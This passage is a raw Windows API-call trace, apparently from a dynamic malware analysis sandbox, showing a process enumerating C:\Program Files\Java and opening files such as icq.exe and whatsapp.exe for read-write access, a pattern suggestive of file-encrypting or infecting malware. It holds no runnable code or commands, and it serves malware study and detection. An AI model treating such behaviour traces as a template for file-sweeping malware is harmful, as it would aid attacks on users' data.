Parameter=0x1086e48, Context=0x0) returned 1 [0089.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.847] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0089.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0089.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0089.847] FindNextFileW (in: hFindFile=0x78650, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b42f70b, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3b42f70b, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft Office", cAlternateFileName="MICROS~2")) returned 1 [0089.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0089.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0089.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0089.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0089.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0089.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0089.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0089.847] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0089.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0089.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0089.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0089.847] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0089.847] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x780d0 [0089.848] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x3b40933c, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3b40933c, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.848] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56045cb0, ftCreationTime.dwHighDateTime=0x1d56eda, ftLastAccessTime.dwLowDateTime=0x8aedd870, ftLastAccessTime.dwHighDateTime=0x1d5b287, ftLastWriteTime.dwLowDateTime=0x8aedd870, ftLastWriteTime.dwHighDateTime=0x1d5b287, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="icq.exe", cAlternateFileName="")) returned 1 [0089.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0089.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0089.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46898 [0089.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0089.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0089.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0089.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0089.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0089.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0089.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0089.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0089.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0089.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0089.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0089.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.848] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0089.848] AreFileApisANSI () returned 1 [0089.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\icq.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\icq.exe", lpUsedDefaultChar=0x0) returned 30 [0089.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.848] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.848] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0089.849] AreFileApisANSI () returned 1 [0089.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0089.849] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x536d0 [0089.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x536d0, cchWideChar=30 | out: lpWideCharStr="C:\\Program Files\\Java\\icq.exe") returned 30 [0089.849] CreateFileW (lpFileName="C:\\Program Files\\Java\\icq.exe" (normalized: "c:\\program files\\java\\icq.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0089.849] GetFileType (hFile=0x420) returned 0x1 [0089.849] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0089.849] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.849] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.849] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.850] CloseHandle (hObject=0x420) returned 1 [0089.850] AreFileApisANSI () returned 1 [0089.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0089.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53760 [0089.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x886a8, cbMultiByte=-1, lpWideCharStr=0x53760, cchWideChar=30 | out: lpWideCharStr="C:\\Program Files\\Java\\icq.exe") returned 30 [0089.850] CreateFileW (lpFileName="C:\\Program Files\\Java\\icq.exe" (normalized: "c:\\program files\\java\\icq.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.850] GetLastError () returned 0x20 [0089.850] GetLastError () returned 0x20 [0089.850] SetLastError (dwErrCode=0x20) [0089.850] GetLastError () returned 0x20 [0089.850] SetLastError (dwErrCode=0x20) [0089.850] GetLastError () returned 0x20 [0089.850] SetLastError (dwErrCode=0x20) [0089.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0089.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0089.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.850] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.850] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.850] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xafba0b05, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jre1.8.0_144", cAlternateFileName="JRE18~1.0_1")) returned 1 [0089.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.850] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0089.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0089.851] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.851] AreFileApisANSI () returned 1 [0089.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144", lpUsedDefaultChar=0x0) returned 35 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0089.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.851] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.851] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0089.852] AreFileApisANSI () returned 1 [0089.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0089.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69030 [0089.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x69030, cchWideChar=35 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144") returned 35 [0089.852] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144" (normalized: "c:\\program files\\java\\jre1.8.0_144"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.852] GetLastError () returned 0x5 [0089.852] GetLastError () returned 0x5 [0089.852] SetLastError (dwErrCode=0x5) [0089.852] GetLastError () returned 0x5 [0089.852] SetLastError (dwErrCode=0x5) [0089.852] GetLastError () returned 0x5 [0089.852] SetLastError (dwErrCode=0x5) [0089.852] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69030 | out: hHeap=0x20000) returned 1 [0089.852] AreFileApisANSI () returned 1 [0089.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0089.852] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0089.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x68c70, cchWideChar=35 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144") returned 35 [0089.852] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144" (normalized: "c:\\program files\\java\\jre1.8.0_144"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.852] GetLastError () returned 0x5 [0089.852] GetLastError () returned 0x5 [0089.852] SetLastError (dwErrCode=0x5) [0089.852] GetLastError () returned 0x5 [0089.852] SetLastError (dwErrCode=0x5) [0089.853] GetLastError () returned 0x5 [0089.853] SetLastError (dwErrCode=0x5) [0089.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0089.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0089.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0089.853] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.853] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.853] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.853] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0089.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0089.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0089.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0089.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0089.853] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb6aa180, ftCreationTime.dwHighDateTime=0x1d585b5, ftLastAccessTime.dwLowDateTime=0xd8070050, ftLastAccessTime.dwHighDateTime=0x1d5ad64, ftLastWriteTime.dwLowDateTime=0xd8070050, ftLastWriteTime.dwHighDateTime=0x1d5ad64, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="whatsapp.exe", cAlternateFileName="")) returned 1 [0089.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.853] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0089.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0089.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0089.853] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0089.853] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78110 [0089.854] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xafba0b05, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.854] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0eaff93, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0089.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0089.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0089.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0089.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0089.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0089.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0089.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0089.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0089.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0089.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.854] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0089.854] AreFileApisANSI () returned 1 [0089.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin", lpUsedDefaultChar=0x0) returned 39 [0089.854] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0089.854] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 